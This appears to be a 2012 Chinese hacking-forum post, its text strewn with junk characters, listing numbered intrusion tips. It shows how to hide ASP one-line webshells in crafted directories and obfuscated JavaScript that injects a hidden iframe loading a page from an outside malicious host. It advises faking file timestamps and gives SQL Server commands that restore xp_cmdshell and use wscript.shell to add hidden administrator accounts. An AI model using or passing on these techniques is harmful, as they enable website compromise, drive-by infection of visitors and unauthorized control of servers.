4 w! X. R0 `1 G' b7 }+ h# y' v6 W, C! W1、建立非标准目录:mkdir images..\
( X5 I; S2 [. L) z+ z; a拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
3 Z* @" a( h8 W0 ]% f& c通过web访问ASP木马:http://ip/images../news.asp?action=login
* F0 @8 v3 G5 Z: i' r如何删除非标准目录:rmdir images..\ /s1 N) F. {1 H! e4 U) L
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:9 |* L" n, A1 b! n9 x$ }
mkdir programme.asp' z, Z u+ U0 F
新建1.txt文件内容:<!--#include file=”12.jpg”-->
* f& t3 v1 T8 ?; {" {0 L9 N新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件- `; A9 p! }1 L% @3 n# N. Y }8 e
attrib +H +S programme.asp
* H4 Y: H2 a( T6 n5 p- [通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt, ^- M) |3 g$ M+ ?
5 M5 E: {+ F) A9 w+ z
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
( c3 h/ h$ \) {# [% l$ V8 h3 T- L然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, E9 E o1 ]' t# |
! |* G$ K: X4 I/ @3 w3 B% x! ]! L* _- S
55、JS隐蔽挂马1 t& H1 C) D5 P, _
1.5 a) d6 F0 \8 r+ r# ~
var tr4c3="<iframe src=ht";
& r8 F9 _* G L$ T3 I' }7 V8 g- Htr4c3 = tr4c3+"tp:/";
3 v% @- M, s3 s; Dtr4c3 = tr4c3+"/ww";8 ]' J, e7 ^" P
tr4c3 = tr4c3+"w.tr4";
) U. [# p8 x* W7 v9 H* jtr4c3 = tr4c3+"c3.com/inc/m"; I; P6 F" D# P/ e/ B
tr4c3 = tr4c3+"m.htm style="display:none"></i";1 ~! I. l7 z' J9 v
tr4c3 =tr4c3+"frame>'";) n4 W/ A h( q5 W( K; `) z
document.write(tr4c3);* a9 }& i; Y+ e
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 A! c& ?% s+ c2 {4 V
+ I8 K) m. o9 G! {3 u3 M, W2.
. z0 D Z8 p) H$ C. ^- }9 Q# l转换进制,然后用EVAL执行。如
- E: I; i8 W3 meval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73"); S5 g2 I: K" i4 f, k. t: p" w
不过这个有点显眼。0 n2 `0 E( r0 C- w
3.
9 J9 U0 ^$ W6 d0 fdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');5 c" N$ Y7 N. i0 [" ]' _
最后一点,别忘了把文件的时间也修改下。
3 L5 M& k1 d. s' P! E' ]: |9 W- H6 S3 K9 a/ @0 p* i) j
56.3389终端入侵常用DOS命令: O/ U0 w+ l3 d5 }
taskkill taskkill /PID 1248 /t# d# p/ K2 C5 S% W6 A9 Q- U
4 n \/ U) i" I* B* E0 n% ztasklist 查进程
3 S! B. N5 Q8 s9 S! H
+ O( W+ Q* E0 I. C% r, bcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. Q; g: s1 L0 t; F- a$ K) Ciisreset /reboot
$ H6 ~. K! W# A' ytsshutdn /reboot /delay:1 重起服务器
, S6 ]: [" ?4 x0 j1 x9 c9 M4 v' ?8 F
: Y( L2 Z8 Q# g& a) G$ wlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
9 n+ {% b$ W0 J& E, t
. i0 W/ V1 v3 Z: C. }" l8 vquery user 查看当前终端用户在线情况
( u6 p+ f, c- Q e- ?
) h( c9 d& _% N要显示有关所有会话使用的进程的信息,请键入:query process ** s. t- o. n3 F, q5 m) L9 I. N# _
, A) u: x) R3 m; E4 M要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
" ~; v3 `0 L# y0 ` A9 [$ t5 G, w8 W. c
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' E9 h4 G: v; Q
9 a' i" o: G+ w6 Z
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
5 m7 r7 j3 ?; a# w+ \$ O2 g9 q" K. H
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启3 V2 h3 P6 e% C, T" G- S
% y# j/ `" a: u4 J( \: p4 Y/ n
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
' W) U! c0 ?" D: G
9 ]& D# C4 T& K: F r命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。" B/ s7 p' w( O" s6 N7 H' A
' O- R1 j* b! Y ]/ u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机8 u- o% a3 S9 j* h3 J5 @# R# x, v5 T, q
$ g- p1 Y' ?% N) D56、在地址栏或按Ctrl+O,输入:8 @' v! K1 X+ V+ c4 D. h
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 [% }4 U, u5 j- R
+ ]0 k: k1 g, s' x源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: H' x q ]4 B$ w: S7 g
4 H# S0 T, T6 H6 a4 y6 d& ~
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,; b% \6 H1 G" e
用net localgroup administrators是可以看到管理组下,加了$的用户的。
|' y O$ T; y( X4 B) d @0 Y' m: b% M. L+ o0 B' Y
58、 sa弱口令相关命令4 i% O u6 n9 f5 B8 e1 |
( [2 | s/ Z7 O+ O2 ^一.更改sa口令方法:
+ U3 N5 L4 X! [ h, Q* L" m用sql综合利用工具连接后,执行命令:0 a( V- _# A' ?9 D. K, z
exec sp_password NULL,'20001001','sa'
: {, W/ n l4 M) k2 Z1 W; U(提示:慎用!) M: B M! c3 K5 w( Q
$ F1 }3 N. u6 b7 u/ _7 d- W
二.简单修补sa弱口令.
, Z4 W. Y$ u4 f2 E O0 H8 q, O9 g+ n) Y- g, f% `
方法1:查询分离器连接后执行:2 f. z" i) F6 M* f' b5 n* E: s
if exists (select * from
& h" [5 i0 H8 c3 _5 m& a5 v3 tdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* B2 c! K1 q4 V" v Y! P: fOBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 X0 o2 h0 l5 u( t- M
: i6 |! p: `! e' O+ E" ^
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% b' \* t2 w P5 O2 M0 U, o8 I8 g/ C
/ b7 t' P1 G6 [6 I' `1 [
GO
, q: Y% g( ?- U, X9 |
9 _. t6 t! d. P' o* O4 p0 a然后按F5键命令执行完毕
% C. q- M3 E1 m' h; I9 e9 E
5 v2 E( X. [" K7 ?' x方法2:查询分离器连接后3 J& \ }: Z* G7 q2 J" X. U
第一步执行:use master. Z3 W/ O6 r( H( q
第二步执行:sp_dropextendedproc 'xp_cmdshell'8 Y3 @# V! r) z( O' k0 d2 g
然后按F5键命令执行完毕# ^9 m0 G; S8 d, K: l+ g
2 e% a9 L# @. _0 W1 n/ }4 v' |0 v7 l: m: T, A# F) E+ Z! N2 a: i
三.常见情况恢复执行xp_cmdshell. a! v- n7 R5 ], F( M
$ [+ r: q' _) G- W5 c+ G+ T
! r I" p$ @' \8 s- A1 未能找到存储过程'master..xpcmdshell'.
; L; Y8 D# z/ T( C5 W1 S. i- F 恢复方法:查询分离器连接后,
! X+ B; O0 I7 U( E' \' K0 H第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
% W1 o8 `! X0 [, ?. h第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% H' x$ J& F% y( y D
然后按F5键命令执行完毕
+ Q. p% f2 y/ `% A8 U! d2 ^
" h4 }) H) f0 z% ^: i( R* g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)3 z8 f; \! E/ h+ P( g
恢复方法:查询分离器连接后,
# N/ u+ l0 ]1 i8 p$ }! }' m第一步执行:sp_dropextendedproc "xp_cmdshell"3 k& f2 y$ X: v. P
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 h9 e% g1 K6 R8 w6 [" b* D$ m
然后按F5键命令执行完毕5 R, R) m% R2 p3 s6 O3 a* r
' ^9 b. B- \+ v
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): |/ ]7 |) Y( k) Z3 j/ y! C
恢复方法:查询分离器连接后,9 l3 w% [6 Y/ {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
2 {" h0 W/ W, G7 _. x) U, ?第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' - l! J1 C X* r x
然后按F5键命令执行完毕
* z! Q. b" b$ L) M1 J# r/ i
" S' q* \4 u7 ?7 u; s! s+ ~四.终极方法.1 G$ h/ I$ E, W! Q! x# L: V
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
" A/ F% G# m1 u查询分离器连接后,' ]5 d2 _- N9 i2 v" Q
2000servser系统:5 ~1 L4 \' C# y6 y6 K, ~0 }( f3 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'/ F: e% c. p3 x1 Y0 }1 R) D
8 q% L b p6 f) N( Q' g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: p& ?1 x. t, I" R! [( \; _, G4 N e1 O2 ]' M5 i
xp或2003server系统:
2 P( A6 [& ]' E# N' G3 e( k4 Y- ?1 {) M. o/ L; d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'6 q7 K F4 n; ^" R
' h! a* a6 x) D9 d# ]6 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 n# i- { Z: C! q K8 b |
发表于 2012-9-15 14:51:03
收藏
支持
反对